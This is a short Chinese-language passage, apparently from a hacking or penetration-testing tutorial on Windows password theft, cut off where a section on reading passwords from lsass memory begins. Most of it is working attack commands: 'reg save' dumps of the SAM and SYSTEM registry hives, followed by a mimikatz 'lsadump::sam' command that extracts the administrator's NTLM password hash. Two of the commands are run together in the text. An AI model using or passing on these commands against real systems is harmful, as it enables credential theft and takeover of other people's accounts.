密码窃取 注册表读取密码 注册表读取密码主要获取的是两个文件: reg save HKLM\SYSTEM Sys.hivreg save HKLM\SAM Sam.hiv 导出注册表之后,我们可以通过mimikatz读取密码hash值: mimikatz读取密码mimikatz.exe "lsadump::sam /sam:Sam.hiv /system:Sys.hiv " exit> hiv.txt 其中:NTLM加密的hash就是管理员登陆的加密密码! lsass内存读取密码 lsass.exe是一个系统…